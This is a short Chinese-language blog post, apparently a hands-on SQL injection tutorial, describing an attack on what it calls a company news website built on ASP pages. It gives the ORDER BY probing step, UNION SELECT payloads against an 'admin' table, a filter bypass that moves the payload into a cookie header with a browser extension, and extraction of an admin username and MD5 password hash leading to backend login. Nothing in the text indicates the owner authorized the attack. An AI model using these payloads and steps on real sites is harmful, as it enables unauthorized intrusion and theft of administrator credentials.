还是实战,如果没什么事的话几乎每天日更
目录
- 前言
- 一、
- 总结
前言
sql实战-2
提示:以下是本篇文章正文内容,下面案例可供参考
一、
公司的新闻网
我们进入一篇文章,我们发现这个网页应该是ASP动态网页文件
还记得第一篇文章的sql注入吗?如果不知道的话,可以看看这里
?id=171 order by 10
哎呀,不出啊
那就试试11,12,13
哦,出错了,这说明什么,这说明此页面存在sql注入
?id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin
插入吧
该死,有防,那怎么办,写不了了不更了,人走高飞
有防的?没关系,就用ModHeader,
Edge点这个下载
fire fox点击这个下载
新建Request头
刚安装的应该就有,不用新建
好了吗,如果准备好了,我们就继续,Let’s go
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
把这串代码扔到value,name取cookie,就像这样
出现了这个🤔
换,换上这个。
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
哎,这不就出来了吗
这是个什么玩意?b9a2a2b5dffb918c
这是MD5
好了GAME OVER
然后就帅气的进入后台
用户名一般都是admin
密码就是md5解密的密码
总结
总结就是:我头像真好看自恋重度患者
